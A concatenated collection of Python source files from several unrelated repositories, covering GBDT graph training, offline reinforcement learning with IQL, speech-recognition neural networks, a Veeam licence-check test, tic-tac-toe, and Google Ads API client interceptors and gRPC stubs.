plt.text(0.45, 0.8, "ToD Total: $" + str(tod_total),
transform=axarr[1, 1].transAxes)
plt.text(0.45, 0.7, "Savings Total: $" + str(savings_total),
transform=axarr[1, 1].transAxes)
format_plots(axarr[1, 1])
# Export
f.subplots_adjust(wspace=0.25, hspace=0.35)
f.set_size_inches(11, 7)
f.savefig('DTE.pdf', bbox_inches='tight')
f.clf()
``` |
{
"source": "JiuhaiChen/GBDT",
"score": 2
} |
#### File: JiuhaiChen/GBDT/GBDT.py
```python
import sys
import time
LARGE_NUMBER = sys.maxsize
import numpy as np
import torch
import pdb
import torch.nn.functional as F
from modules import UnfoldindAndAttention
import pandas as pd
from Base import *
from collections import defaultdict as ddict
from catboost import Pool, CatBoostClassifier, CatBoostRegressor, sum_models
class GBDT(object):
def __init__(self, task, graph, train_mask, test_mask, val_mask):
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
self.task = task
self.graph = graph
self.train_mask = train_mask
self.test_mask = test_mask
self.val_mask = val_mask
self.params = {'learning_rate': 1.0}
self.best_iteration = None
self.iter_per_epoch = 10
self.depth = 6
self.gbdt_lr = 0.1
self.propagation_X = UnfoldindAndAttention(lam=20.0, prop_step=5)
self.propagation_y = UnfoldindAndAttention(lam=2.0, prop_step=5)
def _calc_data_scores(self, X, epoch):
if epoch == 0:
scores = torch.zeros(self.num_samples, self.out_dim)
else:
scores = self.gbdt_model.predict(X)
scores = torch.from_numpy(scores).float().view(self.num_samples, self.out_dim)
return scores.to(self.device)
def _calc_gradient(self, scores, labels):
scores.requires_grad_()
with torch.enable_grad():
assert len(scores.size()) == 2
scores_correct = self.propagation_y.forward(self.graph, scores)
if self.task == 'regression':
loss = F.mse_loss(scores_correct[self.train_mask], labels[self.train_mask], reduction='sum')
elif self.task == 'classification':
loss = F.cross_entropy(scores_correct[self.train_mask], labels[self.train_mask].long(), reduction='sum')
grad = torch.autograd.grad(loss, scores, only_inputs=True)[0]
grad = grad.detach()
return - grad.cpu().numpy()
def _calc_loss(self, X, y, metrics):
pred = self.gbdt_model.predict(X)
pred = torch.from_numpy(pred).float().view(self.num_samples, self.out_dim).to(self.device)
assert len(pred.size()) == 2
scores_correct = self.propagation_y.forward(self.graph, pred)
train_results = self.evaluate_model(scores_correct, y, self.train_mask)
test_results = self.evaluate_model(scores_correct, y, self.test_mask)
val_results = self.evaluate_model(scores_correct, y, self.val_mask)
# pdb.set_trace()
for metric_name in train_results:
metrics[metric_name].append((train_results[metric_name].detach().item(),
val_results[metric_name].detach().item(),
test_results[metric_name].detach().item()
))
return train_results, test_results, val_results
# return self.evaluate_model(scores_correct, y, self.train_mask), \
# self.evaluate_model(scores_correct, y, self.test_mask), \
# self.evaluate_model(scores_correct, y, self.val_mask),
def evaluate_model(self, logits, target_labels, mask):
metrics = {}
y = target_labels[mask]
with torch.no_grad():
pred = logits[mask]
if self.task == 'regression':
metrics['loss'] = torch.sqrt(F.mse_loss(pred, y))
metrics['accuracy'] = F.l1_loss(pred, y)
elif self.task == 'classification':
metrics['loss'] = F.cross_entropy(pred, y.long())
metrics['accuracy'] = torch.Tensor([(y == pred.max(1)[1]).sum().item()/y.shape[0]])
return metrics
def init_gbdt_model(self, num_epochs):
if self.task == 'regression':
catboost_model_obj = CatBoostRegressor
catboost_loss_fn = 'RMSE'
else:
catboost_model_obj = CatBoostRegressor
catboost_loss_fn = 'MultiRMSE'
return catboost_model_obj(iterations=num_epochs,
depth=self.depth,
learning_rate=self.gbdt_lr,
loss_function=catboost_loss_fn,
random_seed=0,
nan_mode='Min')
def fit_gbdt(self, pool, trees_per_epoch):
gbdt_model = self.init_gbdt_model(trees_per_epoch)
gbdt_model.fit(pool, verbose=False)
return gbdt_model
def append_gbdt_model(self, new_gbdt_model, weights):
if self.gbdt_model is None:
return new_gbdt_model
return sum_models([self.gbdt_model, new_gbdt_model], weights=weights)
def train_gbdt(self, gbdt_X_train, gbdt_y_train, cat_features, epoch,
gbdt_trees_per_epoch, gbdt_alpha):
pool = Pool(gbdt_X_train, gbdt_y_train, cat_features=cat_features)
epoch_gbdt_model = self.fit_gbdt(pool, gbdt_trees_per_epoch)
self.gbdt_model = self.append_gbdt_model(epoch_gbdt_model, weights=[1, gbdt_alpha])
def train(self, params, encoded_X, target, cat_features=None, num_boost_round=20, early_stopping_rounds=5):
self.params.update(params)
self.gbdt_model = None
self.epoch_gbdt_model = None
metrics = ddict(list)
shrinkage_rate = 1.0
best_iteration = None
best_val_loss = LARGE_NUMBER
train_start_time = time.time()
self.num_samples = target.size(0)
if self.task == 'regression':
self.out_dim = 1
elif self.task == 'classification':
self.out_dim = int(target.max() + 1)
target = target.squeeze()
print("Training until validation scores don't improve for {} rounds.".format(early_stopping_rounds))
## propagate the feature
assert len(encoded_X.size()) == 2
corrected_X = self.propagation_X.forward(self.graph, encoded_X)
## cat the propagated features and orignal features
feature = torch.cat((encoded_X, corrected_X), 1).cpu().numpy()
for iter_cnt in range(num_boost_round):
iter_start_time = time.time()
scores = self._calc_data_scores(feature, iter_cnt)
grad = self._calc_gradient(scores, target.cuda())
self.train_gbdt(feature, grad, cat_features, iter_cnt, self.iter_per_epoch, gbdt_alpha=shrinkage_rate)
# if iter_cnt > 0:
# shrinkage_rate *= self.params['learning_rate']
if iter_cnt > 0:
shrinkage_rate = self.params['learning_rate']
train_metric, test_metric, val_metric = self._calc_loss(feature, target.cuda(), metrics)
train_loss = train_metric['loss']
test_loss = test_metric['loss']
val_loss = val_metric['loss']
test_accuracy = test_metric['accuracy']
val_loss_str = '{:.10f}'.format(val_loss) if val_loss else '-'
print("Iter {:>3}, Train's Loss: {:.10f}, Test's Loss: {}, Valid's Loss: {}, Test's Accuracy: {}, Elapsed: {:.2f} secs"
.format(iter_cnt, train_loss, test_loss, val_loss_str, test_accuracy.item(), time.time() - iter_start_time))
if val_loss is not None and val_loss < best_val_loss:
best_val_loss = val_loss
best_test_loss = test_loss
best_iteration = iter_cnt
best_test_accuracy = test_accuracy
# if iter_cnt - best_iteration >= early_stopping_rounds:
# print("Early stopping, best iteration is:")
# print("Iter {:>3}, Test Loss: {:.10f}".format(best_iteration, best_test_accuracy.item()))
# break
self.best_iteration = best_iteration
print("Training finished. Elapsed: {:.2f} secs".format(time.time() - train_start_time))
plot(metrics, ['train', 'val', 'test'], 'CBS', 'CBS')
exit()
if self.task == 'regression':
return best_test_loss.cpu().numpy()
elif self.task == 'classification':
return best_test_accuracy.cpu().numpy()
```
#### File: JiuhaiChen/GBDT/modules.py
```python
import pdb
import random
from functools import partial
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl import function as fn
from torch.nn import init
from sklearn import preprocessing
from submodules import Propagate, PropagateNoPrecond , Attention
class UnfoldindAndAttention(nn.Module):
r"""
Parameters
----------
d : int
Size of hidden layers.
alp : float
The :math:`\alpha` in paper. If equal to :math:`0`, will be automatically decided based
on other hyper prameters. Default: ``0``.
lam : float
The :math:`\lambda` in paper. Default: ``1``.
prop_step : int
Number of propagation steps
attn_aft : int
Where to do attention. Set to -1 if don't want attention.
tau : float
The :math:`\tau` in paper. Default: ``0.2``.
T : float
The :math:`T` in paper. If < 0, :math:`T` will be set to `\infty`. Default: ``-1``.
p : float
The :math:`p` in paper. Default: ``1``.
use_eta: bool
If use eta vector.
init_att : bool
If True, add another attention layer before propagation. Default: ``False``.
attn_dropout : float
The dropout rate of attention values. Default: ``0.0``.
precond : str
If True, use pre conditioning and unormalized laplacian, else not use pre conditioning
and use normalized laplacian. Default: ``True``
"""
def __init__(self, alp=0, lam=1, prop_step=5, tau=0.2, p=2, precond=False):
super().__init__()
self.alp = alp if alp > 0 else 1 / (lam + 1) # automatic set alpha
self.lam = lam
self.tau = tau
self.p = p
self.prop_step = prop_step
prop_method = Propagate if precond else PropagateNoPrecond
self.prop_layers = nn.ModuleList([prop_method() for _ in range(prop_step)])
self.post_step = lambda x:torch.clamp(x, -1, 1)
def forward(self, g, X, train_mask=None, label=False, error=False):
Y = X
g.edata["w"] = torch.ones(g.number_of_edges(), 1, device = g.device)
g.ndata["deg"] = g.in_degrees().float()
for k, layer in enumerate(self.prop_layers):
# do unfolding
Y = layer(g, Y, X, self.alp, self.lam)
if label == True:
Y[train_mask] = X[train_mask]
elif error == True:
Y = self.post_step(Y)
Y[train_mask] = X[train_mask]
return Y
``` |
{
"source": "jiujiujiu0313/jingziqi",
"score": 4
} |
#### File: jiujiujiu0313/jingziqi/player.py
```python
import board
class Player(object):
def __init__(self,name):
self.name=name
self.score=0
self.chess=None
def move(self,chess_board):
index=-1
while(index not in chess_board.movable_list):
try:
index=int(input(" 请 %s 输入落子位置%s:" %(self.name,chess_board.movable_list)))
except ValueError:
pass
chess_board.move_down(index,self.chess)
if __name__=="__main__":
chess_board=board.Board()
human=Player("玩家")
human.chess="x"
while(not chess_board.is_win(human.chess)):
human.move(chess_board)
chess_board.show_board()
``` |
{
"source": "jiuka/check_veeam_o365",
"score": 2
} |
#### File: plugins/agent_based/test_veeam_o356licenses.py
```python
import pytest # type: ignore[import]
from cmk.base.plugins.agent_based.agent_based_api.v1 import (
Metric,
Result,
Service,
State,
)
from cmk.base.plugins.agent_based import veeam_o365licenses
@pytest.mark.parametrize('section, result', [
([], []),
(
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[Service(item='0')]
)
])
def test_discovery_veeam_o365licenses(section, result):
assert list(veeam_o365licenses.discovery_veeam_o365licenses(section)) == result
@pytest.mark.parametrize('item, params, section, result', [
('0', {}, [], []),
(
'0', {},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.OK, summary='Period of validityt: 30 days 0 hours'),
Metric('licenses', 42.0, levels=(50000.0, 50000.0), boundaries=(0.0, 50000.0)),
Result(state=State.OK, summary='used 42 out of 50000 licenses (warn/crit at 50000/50000)'),
]
),
(
'0', {'validity': (3456000, 1728000)},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50000']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.WARN, summary='Period of validityt: 30 days 0 hours (warn/crit below 40 days 0 hours/20 days 0 hours)'),
Metric('licenses', 42.0, levels=(50000.0, 50000.0), boundaries=(0.0, 50000.0)),
Result(state=State.OK, summary='used 42 out of 50000 licenses (warn/crit at 50000/50000)'),
]
),
(
'0', {'licenses': (10, 5)},
[['Valid', '28.06.2020 02:00:00', '2592000', '42', '50']],
[
Result(state=State.OK, summary='License is vaild till 28.06.2020 02:00:00'),
Result(state=State.OK, summary='Period of validityt: 30 days 0 hours'),
Metric('licenses', 42.0, levels=(40.0, 45.0), boundaries=(0.0, 50.0)),
Result(state=State.WARN, summary='used 42 out of 50 licenses (warn/crit at 40/45)'),
]
),
])
def test_check_veeam_o365licenses(item, params, section, result):
assert list(veeam_o365licenses.check_veeam_o365licenses(item, params, section)) == result
``` |
{
"source": "Jiukaishi/PARL",
"score": 2
} |
#### File: torch/iql/train.py
```python
import pickle
import argparse
import gym
from tqdm import trange
import d4rl
from parl.utils import logger, tensorboard
from replay_buffer import ReplayMemory
from mujoco_model import MujocoModel
from mujoco_agent import MujocoAgent
from parl.algorithms import IQL
import numpy as np
EVAL_EPISODES = 10
MEMORY_SIZE = int(2e6)
BATCH_SIZE = 256
# Runs policy for 5 episodes by default and returns average reward
# A fixed seed is used for the eval environment
def run_evaluate_episodes(agent, env, eval_episodes):
eval_returns = []
for _ in range(eval_episodes):
avg_reward = 0.
obs = env.reset()
done = False
while not done:
action = agent.predict(obs)
obs, reward, done, _ = env.step(action)
avg_reward += reward
eval_returns.append(avg_reward)
eval_returns = np.array(eval_returns)
avg_reward = eval_returns.mean()
return avg_reward, eval_returns
def main():
logger.info("------------------- CQL ---------------------")
logger.info('Env: {}, Seed: {}'.format(args.env, args.seed))
logger.info("---------------------------------------------")
env = gym.make(args.env)
env.seed(args.seed)
obs_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
# Initialize model, algorithm, agent
model = MujocoModel(obs_dim, action_dim)
algorithm = IQL(model, max_steps=args.train_total_steps)
agent = MujocoAgent(algorithm)
# Initialize offline data
rpm = ReplayMemory(
max_size=MEMORY_SIZE, obs_dim=obs_dim, act_dim=action_dim)
rpm.load_from_d4rl(d4rl.qlearning_dataset(env))
model = MujocoModel(obs_dim, action_dim)
algorithm = IQL(model, max_steps=args.train_total_steps)
agent = MujocoAgent(algorithm)
total_steps = 0
test_flag = 0
result = []
for total_steps in trange(args.train_total_steps):
# Train steps
batch_obs, batch_action, batch_reward, batch_next_obs, batch_terminal = rpm.sample_batch(
BATCH_SIZE)
critic_loss, value_loss, actor_loss = agent.learn(
batch_obs, batch_action, batch_reward, batch_next_obs,
batch_terminal)
tensorboard.add_scalar('train/critic_loss', critic_loss, total_steps)
tensorboard.add_scalar('train/value_loss', value_loss, total_steps)
tensorboard.add_scalar('train/actor_loss', actor_loss, total_steps)
# Evaluate episode
if total_steps // args.test_every_steps >= test_flag:
while total_steps // args.test_every_steps >= test_flag:
test_flag += 1
avg_reward, eval_rewards = run_evaluate_episodes(
agent, env, EVAL_EPISODES)
normalized_returns = d4rl.get_normalized_score(
args.env, eval_rewards) * 100
normalized_mean = normalized_returns.mean()
tensorboard.add_scalar('eval/episode_reward', avg_reward,
total_steps)
tensorboard.add_scalar('eval/episode_normalized_reward',
normalized_mean, total_steps)
logger.info('Evaluation: total_steps {}, Reward: {}'.format(
total_steps, avg_reward))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--env",
default="hopper-medium-v2",
help='Mujoco gym environment name in d4rl')
parser.add_argument(
"--seed",
default=60,
type=int,
help='Sets Gym, PyTorch and Numpy seeds')
parser.add_argument(
"--train_total_steps",
default=int(1e6),
type=int,
help='Max time steps to run environment')
parser.add_argument(
'--test_every_steps',
type=int,
default=int(5e3),
help='The step interval between two consecutive evaluations')
args = parser.parse_args()
logger.info(args)
main()
``` |
{
"source": "Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature",
"score": 2
} |
#### File: Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature/ANN.py
```python
import numpy as np
from Dataprocess import load_extra_data, DNN_get_data
import tensorflow as tf
import copy
import matplotlib.pyplot as plt
import pickle
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
#########hyper parameters############
learning_rate = 0.02
Frame_number = 25
Feature_number = 13
commitynumber = 16
batch_size = 32 # len(tags)
EPOCHTIMES = 600 # 600
#################################
networks = []
accuracies = []
cms = []
class Nerual_Networks():
def __init__(self, frame_number=Frame_number,
feature_number=Feature_number,
time_input=1,
name="adam",
network_type="mse",
trainable=True,
lr=learning_rate,
model_file=None):
self.n_features = 10
self.network_type = network_type
self.times_input = 1
self.learning_rate = lr
self.name = name
# -------------- Network --------------
with tf.variable_scope(self.name):
# ------------------------- MLP -------------------------
# MLP网络
if 1:
self.obs_action = tf.placeholder(tf.float32, shape=[None, feature_number * frame_number])
self.iftraining = tf.placeholder(tf.bool, None)
self.f1 = tf.layers.dense(inputs=self.obs_action, units=8, activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),
bias_initializer=tf.constant_initializer(0.1),
trainable=trainable)
self.f3 = tf.layers.dense(inputs=self.f1, units=8, activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),
bias_initializer=tf.constant_initializer(0.1),
trainable=trainable)
self.predict = tf.layers.dense(inputs=self.f3, units=self.n_features, trainable=trainable)
# -------------- Label --------------
if network_type == 'mse':
self.correct_labels = tf.placeholder(tf.int32, [None])
self.labels = tf.one_hot(self.correct_labels, 10)
# 定义loss function
self.square = tf.square(self.predict - self.labels)
self.cross_entropy_mean = tf.reduce_mean(self.square, name='mse')
# -------------- Train --------------
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cross_entropy_mean)
elif network_type == 'cross_entropy':
self.correct_labels = tf.placeholder(tf.int32, [None])
self.cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.predict,
labels=self.correct_labels)
# 定义loss function
self.cross_entropy_mean = tf.reduce_mean(self.cross_entropy, name='cross_entropy')
# -------------- Train --------------
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cross_entropy_mean)
# -------------- Sess --------------
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
# -------------- Saver --------------
self.saver = tf.train.Saver()
if model_file is not None:
self.restore_model(model_file)
# Out put Information
print("================ Build Neural Network ================")
# Learn the model
def learn(self, batch_features, batch_labels):
batch_labels = batch_labels.reshape([-1])
_, loss = self.sess.run([self.train_op, self.cross_entropy_mean], feed_dict={self.obs_action: batch_features,
self.correct_labels: batch_labels,
self.iftraining: True})
return loss
def test(self, correct_label, data):
batch_predictions = tf.cast(tf.argmax(self.predict, 1), tf.int32)
predicted_correctly = tf.equal(batch_predictions, correct_label)
accuracy = tf.reduce_mean(tf.cast(predicted_correctly, tf.float32))
return self.sess.run(accuracy, feed_dict={self.obs_action: data, self.iftraining: False})
def pred(self, data):
batch_predictions = tf.cast(tf.argmax(self.predict, 1), tf.int32)
return self.sess.run(batch_predictions, feed_dict={self.obs_action: data, self.iftraining: False})
# 定义存储模型函数
def save_model(self, model_path):
self.saver.save(self.sess, model_path)
# 定义恢复模型函数
def restore_model(self, model_path):
self.saver.restore(self.sess, model_path)
if __name__ == '__main__':
# 解封装环境
optimizer_type = ['mse', 'cross_entropy']
losses = [[], []]
accus = [[], []]
for i in range(2):
nn = Nerual_Networks(name=str(i), network_type=optimizer_type[i])
# 生成新的网络对象
tags, data = DNN_get_data('SC_MFCC.mat')
# 导入数据
data, testdata, tags, testtags = train_test_split(data, tags, test_size=0.2, random_state=1)
# 分成训练集和数据集
Epochtimes = EPOCHTIMES
batchsize = len(tags)
temp_accuracy = 0
for k in range(Epochtimes):
loss = 0
perm = np.random.permutation(len(tags))
for j in range(len(tags) // batchsize):
start = j * batchsize
end = (j + 1) * batchsize
loss += nn.learn(batch_features=copy.deepcopy(data[start:end].reshape([-1, 25 * 13])),
batch_labels=copy.deepcopy(tags[start:end].reshape([-1, 1])))
if (k + 1) % 100 == 0:
print('total loss', loss / len(tags))
losses[i].append(loss / len(tags))
if (k + 1) % 100 == 0:
accuracy = nn.test(correct_label=testtags, data=testdata)
# temp_accuracy = accuracy
print('accuracy is', round(accuracy, 3))
accus[i].append(round(accuracy, 3))
preds = nn.pred(data=testdata)
cm = confusion_matrix(testtags, preds)
print(cm)
nn.save_model('./models')
networks.append(nn)
plt.plot(losses[0], label='mse')
plt.plot(losses[1], label='cross entropy+softmax')
# plt.plot(losses[2], label='MOMENTUM')
plt.xlabel('epoches', fontsize=16)
plt.ylabel('loss', fontsize=16)
plt.legend()
plt.savefig('./experiments images/mse_crossentropy_compare_loss.png')
plt.clf()
plt.plot(accus[0], label='mse')
plt.plot(accus[1], label='cross entropy+softmax')
plt.xlabel('epoches', fontsize=25)
plt.ylabel('accuracies', fontsize=16)
plt.legend()
plt.savefig('./experiments images/mse_crossentropy_compare_accuracy.png')
plt.clf()
```
#### File: Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature/Dataprocess.py
```python
import numpy as np
import scipy.io
import copy
#generating STFT feature
def get_stft_data(path = 'SE_STFT.mat'):
data = scipy.io.loadmat(path)
data = np.array(data['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([25,13]))
print('=============Successfully generate CNN data==========')
return tags, newdata
#generating MFCC feature
def get_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
# key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
newdata.reshape([-1, 325])
print('=============Successfully generate CNN data==========')
return tags, newdata
#generating mixed feature
def get_moredata(path='SE_MFCC.mat'):
data = scipy.io.loadmat(path)
stft = scipy.io.loadmat('SE_STFT.mat')
data = np.array(data['DB'])
stft = np.array(stft['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
stft = stft[:, 1:]
newdata = np.zeros([len(data), 25, 13])
stft_data= np.zeros([len(stft), 25, 13])
hybrid_data = np.zeros([len(stft), 25, 26])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
for i in range(len(stft)):
stft_data[i] = copy.deepcopy(stft[i].reshape([25, 13]))
for i in range(len(newdata)):
a= newdata[i]
b=stft_data[i]
c = np.hstack((a, b))
hybrid_data[i] = c
print('=============Successfully generate CNN data==========')
return tags, hybrid_data
#calculate the differential data(the difference between two adjunct vectors)
def differential_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
diff_data = np.zeros([len(data), 312])
for i in range(len(data)):
for j in range(len(newdata[0])-1):
newdata[i][j] = (copy.deepcopy(newdata[i][j+1] - newdata[i][j]))
diff_data[i] = newdata[i][:24].reshape([312])
for i in range(len(data)):
diff_data[i] = copy.deepcopy(diff_data[i].reshape([312]))
print('=============Successfully generate differential data==========')
return tags,diff_data
#generate unidimentional MFCC data for ANN
def DNN_get_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
return tags,data
#generate unidimentional STFT data for ANN
def DNN_get_stft_data(path = 'SE_STFT.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
return tags,data
#generate mixed unidimentional data for ANN
def load_extra_data(path='SE_MFCC.mat'):
data = scipy.io.loadmat(path)
STFT_DATA = scipy.io.loadmat('SE_STFT.mat')
data = np.array(data['DB'])
STFT_DATA = np.array(STFT_DATA['DB'])
tags = data[:,0]
tags.astype(int)
stft_tags = STFT_DATA[:,0]
stft_data = STFT_DATA[:,1:]
data = data[:,1:]
data = np.hstack((data, stft_data))
return tags,data
# def load_diff_MFCC_data(path='SE_MFCC.mat'):
# data = scipy.io.loadmat(path)
# STFT_DATA = scipy.io.loadmat('SE_STFT.mat')
# data = np.array(data['DB'])
# STFT_DATA = np.array(STFT_DATA['DB'])
# tags = data[:,0]
# tags.astype(int)
# stft_tags = STFT_DATA[:,0]
# stft_data = STFT_DATA[:,1:]
# _, diff_data = differential_data()
# data = data[:,1:]
# data = np.hstack((data, diff_data))
# return tags,data
``` |
{
"source": "jiulongw/google-ads-python",
"score": 2
} |
#### File: google_ads/interceptors/metadata_interceptor.py
```python
from grpc import UnaryUnaryClientInterceptor
from .interceptor_mixin import InterceptorMixin
class MetadataInterceptor(InterceptorMixin, UnaryUnaryClientInterceptor):
"""An interceptor that appends custom metadata to requests."""
def __init__(self, developer_token, login_customer_id):
self.developer_token_meta = ('developer-token', developer_token)
self.login_customer_id_meta = (
('login-customer-id', login_customer_id) if login_customer_id
else None)
def _update_client_call_details_metadata(self, client_call_details,
metadata):
"""Updates the client call details with additional metadata.
Args:
client_call_details: An instance of grpc.ClientCallDetails.
metadata: Additional metadata defined by GoogleAdsClient.
Returns:
An new instance of grpc.ClientCallDetails with additional metadata
from the GoogleAdsClient.
"""
client_call_details = self.get_client_call_details_instance(
client_call_details.method, client_call_details.timeout, metadata,
client_call_details.credentials)
return client_call_details
def intercept_unary_unary(self, continuation, client_call_details, request):
"""Intercepts and appends custom metadata.
Overrides abstract method defined in grpc.UnaryUnaryClientInterceptor.
Returns:
A grpc.Call/grpc.Future instance representing a service response.
"""
if client_call_details.metadata is None:
metadata = []
else:
metadata = list(client_call_details.metadata)
metadata.append(self.developer_token_meta)
if self.login_customer_id_meta:
metadata.append(self.login_customer_id_meta)
client_call_details = self._update_client_call_details_metadata(
client_call_details,
metadata)
return continuation(client_call_details, request)
```
#### File: ads/google_ads/util.py
```python
import functools
import re
# This regex matches characters preceded by start of line or an underscore.
_RE_FIND_CHARS_TO_UPPERCASE = re.compile(r'(?:_|^)([a-z])')
class ResourceName:
# As of Google Ads API v1 composite resource names are
# delimited by a "~" character.
_COMPOSITE_DELIMITER = '~'
@classmethod
def format_composite(cls, *arg):
"""Formats any number of ID strings into a single composite string.
Note: this utility does not construct an entire resource name string.
It only formats the composite portion for IDs that are not globally
unique, for example an ad_group_ad.
Args:
arg: Any number of str IDs for resources such as ad_groups or
ad_group_ads.
Returns:
A str of all the given strs concatenated with the compsite
delimiter.
Raises:
TypeError: If anything other than a string is passed in.
"""
return cls._COMPOSITE_DELIMITER.join(arg)
def get_nested_attr(obj, attr, *args):
"""Gets the value of a nested attribute from an object.
Args:
obj: an object to retrieve an attribute value from.
attr: a string of the attribute separated by dots.
Returns:
The object attribute value or the given *args if the attr isn't present.
"""
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split('.'))
def convert_upper_case_to_snake_case(string):
"""Converts a string from UpperCase to snake_case.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
new_string = ''
index = 0
for char in string:
if index == 0:
new_string += char.lower()
elif char.isupper():
new_string += f'_{char.lower()}'
else:
new_string += char
index += 1
return new_string
def convert_snake_case_to_upper_case(string):
"""Converts a string from snake_case to UpperCase.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
def converter(match):
"""Convert a string to strip underscores then uppercase it."""
return match.group().replace('_', '').upper()
return _RE_FIND_CHARS_TO_UPPERCASE.sub(converter, string)
```
#### File: proto/services/campaign_audience_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import campaign_audience_view_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2
from google.ads.google_ads.v1.proto.services import campaign_audience_view_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2
class CampaignAudienceViewServiceStub(object):
"""Proto file describing the Campaign Audience View service.
Service to manage campaign audience views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignAudienceView = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignAudienceViewService/GetCampaignAudienceView',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2.GetCampaignAudienceViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2.CampaignAudienceView.FromString,
)
class CampaignAudienceViewServiceServicer(object):
"""Proto file describing the Campaign Audience View service.
Service to manage campaign audience views.
"""
def GetCampaignAudienceView(self, request, context):
"""Returns the requested campaign audience view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignAudienceViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignAudienceView': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignAudienceView,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2.GetCampaignAudienceViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2.CampaignAudienceView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CampaignAudienceViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/campaign_bid_modifier_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import campaign_bid_modifier_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2
from google.ads.google_ads.v1.proto.services import campaign_bid_modifier_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2
class CampaignBidModifierServiceStub(object):
"""Proto file describing the Campaign Bid Modifier service.
Service to manage campaign bid modifiers.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignBidModifier = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignBidModifierService/GetCampaignBidModifier',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.GetCampaignBidModifierRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2.CampaignBidModifier.FromString,
)
self.MutateCampaignBidModifiers = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignBidModifierService/MutateCampaignBidModifiers',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersResponse.FromString,
)
class CampaignBidModifierServiceServicer(object):
"""Proto file describing the Campaign Bid Modifier service.
Service to manage campaign bid modifiers.
"""
def GetCampaignBidModifier(self, request, context):
